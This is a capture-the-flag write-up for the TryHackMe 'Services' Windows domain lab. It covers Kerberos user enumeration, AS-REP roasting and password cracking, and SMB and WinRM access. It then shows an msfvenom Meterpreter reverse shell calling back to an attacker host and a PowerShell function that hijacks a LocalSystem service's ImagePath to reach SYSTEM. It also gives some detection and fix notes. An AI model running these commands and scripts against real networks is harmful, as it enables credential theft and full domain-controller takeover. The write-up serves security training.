CTF Writeup: Services

This writeup covers the Services CTF challenge on TryHackMe, featuring Active Directory user enumeration, AS-REP Roasting, SMB access with the cracked credentials, and privilege escalation through a writable service registry key in a Windows domain environment.

Reconnaissance

Target IP: 10.10.45.7

Nmap Scans:

sudo nmap -T4 -vvv -sV -sC -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3389 10.10.45.7

The open ports (DNS on 53, Kerberos on 88, LDAP/LDAPS on 389/636 and Global Catalog on 3268/3269 alongside SMB and RPC) identified the host as a probable Domain Controller, and the HTTP service on 80 as IIS 10.0. Browsing `/about.html` and `/portfolio.html` revealed staff names and email addresses such as [email protected], which established the naming convention used for domain accounts (first initial, dot, surname) and gave a candidate user list for the domain services.local.

Kerbrute confirmed which candidates were real accounts. The userenum mode sends Kerberos AS-REQs without pre-authentication and distinguishes valid from invalid names by the KDC's error code, so it does not count as a failed logon and will not lock accounts:

kerbrute -d services.local userenum ~/users.txt --dc 10.10.45.7

Exploitation

User j.rock had Kerberos pre-authentication disabled (DONT_REQ_PREAUTH in userAccountControl), which makes the account AS-REP roastable: the KDC hands out an AS-REP whose encrypted part is keyed by the user's password hash, and that ciphertext can be cracked offline. The AS-REP was retrieved with Impacket in hashcat format and cracked with hashcat mode 18200 (Kerberos 5 AS-REP, etype 23/RC4):

impacket-GetNPUsers services.local/j.rock -no-pass -dc-ip 10.10.45.7 -format hashcat -outputfile hash
hashcat -a 0 -m 18200 hash ~/rockyou.txt -O
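The same property GetNPUsers exploits unauthenticated can be queried over LDAP once any domain credential is in hand, which is how you check whether j.rock is the only roastable account (or, on the defensive side, how you audit for the flag). The following is an added example, not code from the original writeup: it uses .NET DirectoryServices only, so it runs from any Windows host without the RSAT module. The domain, DC and j.rock's cracked credentials are taken from the writeup; the function name and the default of reusing j.rock's account are assumptions.

```powershell
# Added example (not from the original writeup): list every account whose
# userAccountControl has DONT_REQ_PREAUTH (0x400000) set, i.e. the property that
# made j.rock AS-REP roastable. Domain, DC and credentials are the writeup's;
# run with -UserName '' from a domain-joined session to use the current token.
param(
    [string]$Domain   = 'services.local',
    [string]$DC       = '10.10.45.7',
    [string]$UserName = 'services.local\j.rock',   # assumption: reusing the cracked account
    [string]$Password = 'Serviceworks1'
)

function Get-AsrepRoastableUser {
    $base = "LDAP://$DC/DC=" + ($Domain -replace '\.', ',DC=')   # services.local -> DC=services,DC=local
    $root = if ($UserName) {
        New-Object System.DirectoryServices.DirectoryEntry($base, $UserName, $Password)
    } else {
        New-Object System.DirectoryServices.DirectoryEntry($base)
    }

    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    # 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND; 4194304 == 0x400000 == DONT_REQ_PREAUTH
    $searcher.Filter   = '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('sAMAccountName', 'userAccountControl', 'memberOf', 'pwdLastSet'))

    foreach ($result in $searcher.FindAll()) {
        $p   = $result.Properties            # keys are lower-cased by DirectorySearcher
        $uac = [int]$p['useraccountcontrol'][0]
        [pscustomobject]@{
            User       = [string]$p['samaccountname'][0]
            UAC        = '0x{0:X}' -f $uac
            Disabled   = ($uac -band 0x2) -ne 0    # ACCOUNTDISABLE: still roastable, but the password is useless
            PwdLastSet = [datetime]::FromFileTime([int64]$p['pwdlastset'][0])
            MemberOf   = @($p['memberof'] | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' }) -join ';'
        }
    }
}

Get-AsrepRoastableUser | Format-Table -AutoSize
```

On the defensive side the fix is `Set-ADAccountControl -Identity j.rock -DoesNotRequirePreAuth $false` on a DC, and the attack itself is visible in Security event 4768 on the DC with Pre-Authentication Type 0 and Ticket Encryption Type 0x17, which is exactly the combination GetNPUsers produces.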

Cracked password: Serviceworks1. The credentials were tested against SMB, and a connection to the administrative C$ share was established:

smbclient \\\\10.10.45.7\\C$ -U services.local/j.rock%Serviceworks1

Flag user.txt was retrieved from C:\Users\j.rock\Desktop\.

Privilege Escalation

RDP was unavailable, but WinRM (TCP 5985) accepted the same credentials. A PowerShell session was obtained with evil-winrm:

evil-winrm -i 10.10.45.7 -u 'j.rock' -p 'Serviceworks1'

A staged x64 Meterpreter payload was generated with msfvenom, uploaded through evil-winrm's built-in upload command, and executed to upgrade the shell (a matching multi/handler listener for windows/x64/meterpreter/reverse_tcp must be running on 10.13.52.19:4445 beforehand):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.52.19 LPORT=4445 -f exe > rev_tcp_meterpreterx64.exe

WinPEAS revealed that `j.rock` had WriteKey and GenericWrite permissions over the registry keys of multiple services under HKLM\SYSTEM\CurrentControlSet\Services. Whoever can write a service's key can change its ImagePath value, which is the binary the Service Control Manager launches under the service's account the next time the service starts.

Exploitation steps (AppHostSvc, the IIS Application Host Helper Service, runs as LocalSystem, and the uploaded payload was placed at C:\Users\j.rock\Documents\payload.exe):

reg add HKLM\SYSTEM\CurrentControlSet\Services\AppHostSvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\j.rock\Documents\payload.exe /f

The new ImagePath is only read when the service starts, so the service was cycled (or the host rebooted, since the service is set to start automatically); the SCM then executed the payload as NT AUTHORITY\SYSTEM, giving a SYSTEM Meterpreter session and allowing retrieval of the final Administrator flag. Two practical caveats: stopping and starting a service requires SERVICE_STOP/SERVICE_START on the service object itself, which write access to the registry key does not grant, so a reboot may be the only way to trigger the start; and a plain Meterpreter executable does not answer the SCM's service-control handshake, so the start reports error 1053 after the timeout even though the payload has already connected back (building the binary with msfvenom -f exe-service avoids that).
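To show what winPEAS is actually checking and what the reg add step does, here is an added example, not code from the original writeup: it lists every service key under HKLM\SYSTEM\CurrentControlSet\Services that the current token can write, together with the account each service runs as, and then performs the same ImagePath swap on AppHostSvc from PowerShell, cycling the service and restoring the original value afterwards. The service name, payload path and user come from the writeup; the function names, the write-rights mask and the restart/restore flow are assumptions for illustration.

```powershell
# Added example, not the original writeup's code: reproduce by hand the winPEAS
# "writable service registry key" finding, then the ImagePath hijack the writeup
# performs on AppHostSvc with reg add. Service, payload path and user are the
# writeup's; helper names and the cycle/restore flow are assumptions.

# User SID plus every group SID in the current token, as strings
$script:TokenSids = @(([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value) +
                    @(([System.Security.Principal.WindowsIdentity]::GetCurrent()).Groups | ForEach-Object Value)

# Any one of these rights on the key is enough to rewrite ImagePath
$script:WriteMask = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, FullControl'

function Get-WritableServiceKey {
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' | ForEach-Object {
        $key = $_
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { return }   # no READ_CONTROL: skip
        $hits = @($acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            (([int]$_.RegistryRights -band [int]$script:WriteMask) -ne 0) -and
            $(try { $script:TokenSids -contains $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { $false })
        })
        if ($hits.Count -gt 0) {
            $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Service   = $key.PSChildName
                RunsAs    = $props.ObjectName    # LocalSystem is the one worth hijacking
                Start     = $props.Start         # 2=Auto (runs at boot), 3=Manual, 4=Disabled
                ImagePath = $props.ImagePath
                GrantedTo = @($hits.IdentityReference.Value | Select-Object -Unique) -join ','
            }
        }
    }
}

function Invoke-ServiceImagePathHijack {
    param(
        [string]$Service = 'AppHostSvc',
        [string]$Payload = 'C:\Users\j.rock\Documents\payload.exe',
        [switch]$KeepHijack    # leave the new ImagePath in place when relying on a reboot
    )
    $keyPath  = "HKLM:\SYSTEM\CurrentControlSet\Services\$Service"
    $props    = Get-ItemProperty -Path $keyPath
    Write-Host "[*] $Service runs as $($props.ObjectName); original ImagePath: $($props.ImagePath)"

    # Same write as the writeup's reg add; keep REG_EXPAND_SZ so %SystemRoot%-style values still expand
    Set-ItemProperty -Path $keyPath -Name ImagePath -Value $Payload -Type ExpandString

    # The SCM reads ImagePath only on start. Stop/start need rights on the service
    # object, which the registry ACE does not give; an Auto service still fires at next boot.
    try { Stop-Service -Name $Service -Force -ErrorAction Stop }
    catch { Write-Warning "Cannot stop ${Service}: $($_.Exception.Message). With Start=2 the payload runs at next boot." }
    try { Start-Service -Name $Service -ErrorAction Stop }
    catch { Write-Warning "Start-Service: $($_.Exception.Message). Error 1053 is expected for a non-service exe; the payload has already run." }

    if (-not $KeepHijack) {
        # Put the original value back so the host can be repaired and the artefact cleaned up
        Set-ItemProperty -Path $keyPath -Name ImagePath -Value $props.ImagePath -Type ExpandString
    }
}

Get-WritableServiceKey | Format-Table -AutoSize
# Invoke-ServiceImagePathHijack     # uncomment once the multi/handler is listening on 10.13.52.19:4445
```

Run the enumeration first and pick a service whose RunsAs is LocalSystem and whose Start is 2; a service that runs as a low-privilege virtual account or is disabled gives nothing even though the key is writable. Restoring ImagePath immediately is fine when the service was cycled by hand, but use -KeepHijack if the start depends on a reboot.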
